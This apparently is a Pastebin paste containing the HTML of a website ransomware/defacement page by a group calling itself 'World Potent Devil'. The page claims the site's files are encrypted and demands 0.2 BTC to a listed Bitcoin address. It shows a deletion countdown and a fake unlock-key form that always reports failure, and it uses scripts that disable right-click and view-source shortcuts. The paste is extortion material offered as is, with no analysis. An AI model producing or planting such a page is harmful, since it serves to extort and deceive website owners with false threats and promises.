Advertisement
Guest User

Ransomware attack

a guest
Feb 20th, 2019
362
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.23 KB | None | 0 0
  1. <html>
  2. <title>RaNsOmEwArE iNjEcTeD bY World Potent Devil</title>
  3. <link rel="icon" href="http://downloadicons.net/sites/default/files/lock-icon-5800.png" type="image/x-icon">
  4. <head>
  5. <meta property="og:title" content="Touched By World Potent Devil">
  6. <style type="text/css">a{color:#8080ff;}#kiri{float:left;}#kiri-gambar{padding-left:30px;padding-top:30px;}#isi{padding-left:50px;}#isi-content{background-color:white;width:65%;font-size:20px;text-align:left;margin-left:30%;padding-left:3px;padding-top:3px;padding-right:3px;padding-bottom:3px;}#isi-judul{font-size:40px;color:white;padding-right:250px;text-align:center;}#isi-window{text-align:left;}#isi-gambar{margin-left:30%;}#isi-kolom{float:left;padding-left:30px;font-size:20px;color:white;}input[type=text],select{width:400px;margin:8px 0;padding:14px 20px;border:1px solid #ccc;border-radius:4px;box-sizing:border-box;}button{width:200px;background-color:#4CAF50;color:white;padding:16px 20px;margin:8px 0;border:none;border-radius:4px;cursor:pointer;}#sisa-waktu{font-family:"Palatino Linotype","Book Antiqua",Palatino,serif;font-size:30px;padding-left:30px;padding-top:30px;animation:blink-animation 1s steps(5,start) infinite;-webkit-animation:blink-animation 1s steps(5,start) infinite;}#hacked{padding-top:115px;font-family:"Palatino Linotype","Book Antiqua",Palatino,serif;color:white;width:25%;}@keyframes blink-animation{to{visibility:hidden;}}@-webkit-keyframes blink-animation{to{visibility:hidden;}}#timer{font-family:"Palatino Linotype","Book Antiqua",Palatino,serif;font-size:25px;padding-left:30px;padding-top:none;color:white;}#waktu{border:3px;color:white;}#about{font-family:"Palatino Linotype","Book Antiqua",Palatino,serif;font-size:20px;padding-left:30px;padding-top:100px;}#countdown{font-family:sans-serif;color:#fff;display:inline-block;text-align:center;font-size:30px;background:#ff6600;font-weight:100;width:100%;}</style>
  7. </head>
  8. <head>
  9. </head>
  10. <body style="background:#990000;border: 25px solid #e20733;border-radius:4px;box-sizing: border-box;">
  11. <div id="kiri">
  12. <div id="kiri-gambar"><img src="http://www.homelandsecureit.com/wp-content/uploads/2011/01/security-padlock.gif" height="200px" width="200px"></div>
  13. <script type="text/javascript">
  14. var cday;
  15. var timeInSecs;
  16. var ticker;
  17.  
  18. function getSeconds() {
  19. var now = new Date();
  20. var nowtime= now.getTime(); // time now in milliseconds
  21. var countdowntime = new Date(now.getFullYear(),now.getMonth(),now.getDate(),20,0,0); // 16 hrs = 4 pm
  22. // countdowntime - change time hh,mm,ss to whatever time required, e.g. 7,50,0 (0750)
  23.  
  24. var dy = 5 ; // Friday (day 5) - change for other days 0-6
  25. var atime = countdowntime.getTime();
  26. var diff = parseInt((atime - nowtime)/1000); // positive if date is in future
  27. if (diff >0) {
  28. cday = dy - now.getDay();
  29. }
  30. else {
  31. cday = dy - now.getDay() -1;
  32. }
  33. if (cday < 0) { cday += 7; } // aleady passed countdown time, so go for next week
  34. if (diff <= 0) { diff += (86400 * 7) }
  35. startTimer (diff);
  36. }
  37.  
  38. function startTimer(secs) {
  39. timeInSecs = parseInt(secs);
  40. ticker = setInterval("tick()",1000);
  41. tick(); // to start counter display right away
  42. }
  43.  
  44. function tick() {
  45. var secs = timeInSecs;
  46. if (secs>0) {
  47. timeInSecs--;
  48. }
  49. else {
  50. clearInterval(ticker); // stop counting at zero
  51. getSeconds(); // and start all over again!
  52. }
  53.  
  54. var days = Math.floor(secs/86400);
  55. secs %= 86400;
  56. var hours= Math.floor(secs/3600);
  57. secs %= 3600;
  58. var mins = Math.floor(secs/60);
  59. secs %= 60;
  60. var result = days +":";
  61. result += ((hours < 10 ) ? "0":"" ) + hours + ":" + ( (mins < 10) ? "0" : "" ) + mins
  62. + ":" + ( (secs < 10) ? "0":"" ) + secs + "";
  63. document.getElementById("countdown").innerHTML = result;
  64. }
  65.  
  66.  
  67. var isCtrl = false;
  68. document.onkeyup=function(e)
  69. {
  70. if(e.which == 17)
  71. isCtrl=false;
  72. }
  73. document.onkeydown=function(e)
  74. {
  75. if(e.which == 17)
  76. isCtrl=true;
  77. if((e.which == 85) || (e.which == 67) && (isCtrl == true))
  78. {
  79. return false;
  80. }
  81. }
  82. var isNS = (navigator.appName == "Netscape") ? 1 : 0;
  83. if(navigator.appName == "Netscape") document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
  84. function mischandler(){
  85. return false;
  86. }
  87. function mousehandler(e){
  88. var myevent = (isNS) ? e : event;
  89. var eventbutton = (isNS) ? myevent.which : myevent.button;
  90. if((eventbutton==2)||(eventbutton==3)) return false;
  91. }
  92. document.oncontextmenu = mischandler;
  93. document.onmousedown = mousehandler;
  94. document.onmouseup = mousehandler;
  95.  
  96. </script>
  97. <div id="waktu">
  98. <div id="sisa-waktu">
  99. All files will be delete on :
  100. </div>
  101. <div id="timer">
  102. <body onload="getSeconds()">
  103. <div id="CountDownLogo">
  104. <span id="title"</span>
  105. <br><br>
  106. <span id="countdown"> </span>
  107. </div>
  108. </div>
  109. </div>
  110.  
  111. <div id="about">
  112. <a href="https://en.wikipedia.org/wiki/Bitcoin" target="_blank"></a><br><br>
  113. <a href="https://www.bitcoin.com/buy-bitcoin" target="_blank"></a><br><br>
  114. <a href="https://www.facebook.com/BangladeshCyberGho5t.12"><b></b></a>
  115. </div>
  116. </div>
  117. <div id="isi">
  118. <br>
  119. <br>
  120. <div id="isi-judul">Ooops, your website have been encrypted! by http://www.homelandsecureit.com/wp-content/uploads/2011/01/security-padlock.gif</div>
  121. <br>
  122. <br>
  123. <div id="isi-content">
  124. <div id="content-judul">
  125. <u><b>What happened to my website ?</u></b></style><br>
  126. </div>
  127. Your important website files are encrypted.
  128. Many of your .php, .css, .js, and other files are no longer accessible
  129. because they have been encrypted. Maybe you are busy looking for a way to
  130. recover your files, but do not waste your time! Nobody can decrypt your files
  131. without our special decryption service.
  132. <br>
  133. <br>
  134. <div id="content-judul">
  135. <u><b>Can i recover my website ?</u></b></style><br>
  136. </div>
  137. Sure, we guarantee that you can recover all your files safely and easily. But you have not enough time.
  138. You can decrypt all your website file safely, how ? You must pay with Bitcoin.
  139. <br>
  140. <br>
  141. <div id="content-judul">
  142. <u><b>How do i pay ?</u></b></style><br>
  143. </div>
  144. Payment is accepted with Bitcoin only, we are not using Paypal, CC, etc. For more information
  145. please click [About BitCoin].
  146. For more information, click [How to buy BitCoin]
  147. And send the correct amount to the address specified in below
  148. After your payment we will send unlock key to you.
  149. <br>
  150. <br>
  151. <div id="content-judul">
  152. <u><b></u></b></style><br>
  153. </div>
  154.  
  155. </div>
  156. <br>
  157. <div id="isi-window">
  158. <div id="isi-gambar"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKAnP6a0_qv1qIt-rHjDltkInvW1BSdoObHKRfpgPFF00DcCZp" align="left"></div>
  159. <div id="isi-kolom">
  160. Payment 0.2 BTC =</font><font color="yellow"> 1Li3BBKbViVVjQ2vJJrymtvLvfePpncMYf</font><br>
  161. <form action="" method="post" style=" text-align: center;">
  162. <label>Key : </label>
  163. <input type="text" name="key" class="inpute" placeholder="your unlock key">
  164. <button onclick="myFunction()">UNLOCK SITE</button>
  165. <script>
  166. function myFunction() {
  167. var txt;
  168. if (confirm("Your payment information was not correct!. If you want our help, please contact us on mail below!") == true) {
  169. txt = "You pressed OK!";
  170. } else {
  171. txt = "You pressed Cancel!";
  172. }
  173. document.getElementById("demo").innerHTML = txt;
  174. }
  175.  
  176.  
  177.  
  178. </div>
  179. </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement